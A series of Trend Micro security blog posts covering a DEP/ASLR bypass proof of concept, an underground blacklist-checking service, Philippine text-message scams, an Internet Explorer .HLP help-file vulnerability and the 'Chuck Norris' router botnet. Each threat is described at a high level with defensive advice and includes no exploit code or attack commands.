Another Proof-of-Concept (POC) Revealed

The changing threat landscape has brought about more sophisticated Web threats, and left the online population clamoring for better security features in the systems and applications that they use. This has pushed Microsoft to develop security mechanisms within its applications like Windows’ Data Execution Protection (DEP) and Address Space Layout Randomization (ASLR).

Both DEP and ASLR are security mechanisms that Microsoft included in its latest Windows releases starting with XP SP2 and Vista, respectively, which should ideally protect systems from being attacked by exploit codes. DEP prevents the execution of code (including malicious shellcode) from certain regions of computer memory (nonexecutable). ASLR, on the other hand, randomizes the layout of regions (data areas) in memory to make guessing the exact location more difficult. But what if these security mechanisms are not so secure after all?

This is what Berend-Jan Wever, aka Skylined (the security researcher responsible for disclosing the heap-spraying technique), came to discover as he reported a new exploit technique that bypasses DEP if the ASLR feature is disabled. In Wever’s full disclosure of the exploit, he discusses the method on how to go around DEP and ASLR using return-to-libc attacks wherein an attacker uses existing code (of the applications being exploited or of the library functions) to carry out the attack rather than run his/her own code.

Possibilities Explored

Although these features make it more difficult to launch code execution on a system, these mechanisms are not perfect and can be bypassed, as revealed in Wever’s exploit codes. This exploit may take advantage of an already-fixed vulnerability in Internet Explorer (IE) but this new technique may pave the way for new exploits that can defeat DEP.

As Trend Micro researcher, Rajiv Motwani, puts it, “history could repeat itself. After Wever released his heap-spraying exploit codes in 2005, a lot of new exploits started using that technique. It would thus be not farfetched that the release of this new POC could lead to the same scenario—new exploits could start using return-to-libc to achieve DEP bypass.”

Furthermore, because the exploit affects DEP, which Microsoft only recently introduced with Windows XP SP2, and ASLR was only enabled by default from Windows Vista onward, we can expect to see more reliable code execution vulnerabilities on new versions of Windows.

Thoughts on Public Disclosures

Given the increasing number of POCs that have gone public, there seems to be a need to give responsible disclosure considerable thought. Trend Micro global director for education, David Perry, notes that there seems to be a lot of disclosure rather than response on the exploit. Public disclosures currently act as double-edged swords that both contribute and complicate the threat landscape.

On one hand, disclosures raise public awareness and push developers to act quickly. On the other hand, however, putting such critical information in the hands of the public could lead to significant exploits, as we recently saw with the most recent zero-day IE vulnerability.

While actual exploits of this vulnerability have yet to be seen in the wild, Trend Micro Deep Security™ already shields users from potential future exploits. Trend Micro OfficeScan™ users with Intrusion Defense Firewall (IDF) plug-in are also protected from this attack if their systems are updated with the latest IDF filters.

Additional text by Ria Rivera

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!

As the security industry evolves, underground cybercriminals are constantly looking for ways to counter the technology challenges presented to them. I recently found out that the bad guys have begun offering services to track the blacklisting of domain names through reputation checks. The number of “businesses” offering this type of service is growing and the service itself has now become semi-automated.

This semi-automation can trace the list of requested domain names against the different Web reputation databases. The most recent service I studied is found on www.{BLOCKED}ervice.net, which offers customers solutions wherein the list of the domain names are regularly checked for blacklisting against Google BlackList (Firefox), ZeuS Tracker, MalwareDomainList.com, SpamHaus, and others. The monthly fee for such a service is currently around US$30 for 100 domains.

The message above translates to:

Zeus TRACKER
Added cheking on ZEUS TRACKER
Join now!
JABBER BOT!
Now clients of our service can use jabber bot, which can help in code crypting and check if the  domain is in black list, check your domains in a real time for the black listing.
Join! It’s easy!
Added API!
Now clients of our service can use our algorithms via API.
This means you can now integrate the algorithms into your software products.

This service offers a Web-based interface for a manual site by site check and a bulk check mechanism. It utilizes an application programing interface (API) and uses Jabber as a communication protocol. Note that this is not the main business of the said site and it still prioritizes bulky JavaScript obfuscation.

These new services demonstrate how adept the cyber underground is at using new technologies and resource to their advantage. The security industry finally understands the need for and has employed technologies such as reputation checks – and the bad guys have already come along and misused the technology to their advantage, in order to make even more money.

Trend Micro protects users from potential attacks via the Smart Protection Network™, which blocks user access to all malicious URLs via the Web reputation service and detects all related malware via the file reputation service.

Text scams are increasingly becoming common again due to the forthcoming Philippine national and local elections, as political campaigns take to rampant text messaging for faster political mobilization. Earlier, I received a text message with the following content:

May GOD bountifuly bles u & ur family. Have a blissful day Fr Frends of UNI-MAD Party List, United Movement Against Drugs no.181′Luv ur famly, say NO 2 drugs.

According to the Philippine National Statistical Coordination Board, the National Telecommunications Commission (NTC) reported an average of 250 million text messages sent daily in 2005. A more updated study reported an upsurge, which more than doubled the said figure in 2009, along with a growth in the number of mobile phone users (i.e., over 63 million).

Numbers such as these in a country known as the “text capital of the world” set the stage for the proliferation of texts scams such as one that features the following message:

CONGRATULATIONS!!!Your # WON TOYOTA AVANZA car w/ 300thou via electronic last Dec.21,2009. For details,please call now Rene Samonte. of Phil. Info. Center on this #.

As similar instances of text scams have already occurred in the past, it is best to take heed and be wary of your mobile phone activities before you fall prey to potential text scams.

Asking for help in Windows could lead to more trouble.

A newly discovered vulnerability in Internet Explorer (IE) leverages the ability of a Visual Basic script to invoke a .HLP (Windows Help file format) file, which could give a remote attacker the ability to run arbitrary code on an affected system.

Visual Basic uses the following syntax to call the MsgBox function, which is used to display message boxes:

MsgBox(prompt[,buttons][,title][,helpfile,context])

However, if a specially crafted .HLP file passes as a variable, remote users would be able to run arbitrary code on an affected system. To trigger the vulnerability, some user interaction is needed, as he/she has to be directed to the page hosting the exploit and to press F1 when the message box appears.

The exploit does not affect all versions of Windows. Systems running Windows 2000, Windows XP, and Windows Server 2003 are vulnerable. Those that run Vista, Server 2008, Server 2008 R2, and Windows 7 are not.

Microsoft is already aware of the issue and has issued the following statement:

Our teams are working to address the issue and once we complete our investigation, we will take appropriate action to protect customers. This may include releasing an update out of band. We will provide further updates as they become available.

In addition, it also released a security advisory that details several workarounds for the said vulnerability. For users, the most important advice is simple—do not press the F1 key when prompted by a website.

Until the official patch is released, however, Trend Micro Deep Security™ can help shield users from this vulnerability and Trend Micro OfficeScan™ users with Intrusion Defense Firewall (IDF) plug-in are also protected from this attack if their systems are updated with the IDF10-009 release and rule number IDF1004019.

Just when you think old-school network bots are dead, a group of cybercriminals revives them from them grave in the name of Chuck Norris. Dubbed the “Chuck Norris botnet,” based on the Italian comment in its source code, in nome di Chuck Norris (translation: “in the name of Chuck Norris”), this botnet infects vulnerable DSL modems and routers to spread a worm Trend Micro detects as WORM_IRCBOT.ABJ.

This worm tries to gain access to a target router by guessing the router’s configuration password using brute force. It may also spread via shared networks by exploiting a known Microsoft vulnerability, MS03-039 Buffer Overrun in RPCSS Service. The worm’s routines make users who are connected to the same network or router at risk of being infected.

This worm also has backdoor capabilities that allows attackers to execute remote command on affected systems, which include downloading and executing other malware and launching denial-of-service (DOS) attacks against other systems. Ultimately, its main goal is still to gain profit from unknowing users by stealing personally identifiable information (PII) and credentials to access certain websites, particularly online banking sites.

Its infection routine via router may be unusual for most bots of its kind, which usually infects computers. But it is not the first time that bots have used modems and routers as a propagation platform. Trend Micro has, in fact, reported such attacks in the past in relation to other threat families such as ZLOB, RBOT, and QHOST.

For more information on how old-school network bots work, you may read Trend Micro’s white paper, “SDBOT IRC Botnet Continues to Make Waves.”

Users are highly advised to keep their systems updated with the latest patches and to use strong router and modem passwords to avoid infection. Computers that may have already been compromised should be immediately isolated from networks and cleaned of the bot.

Trend Micro™ Smart Protection Network™ already protects product users from this threat by detecting and preventing the file’s execution on affected systems via the file reputation service.

Non-Trend Micro product users, on the other hand, can use free tools like RUBotted, which monitors computers for suspicious activities and regularly checks with an online service to identify behaviors associated with bots. Upon discovering potential infections, it prompts users to scan and clean their computers.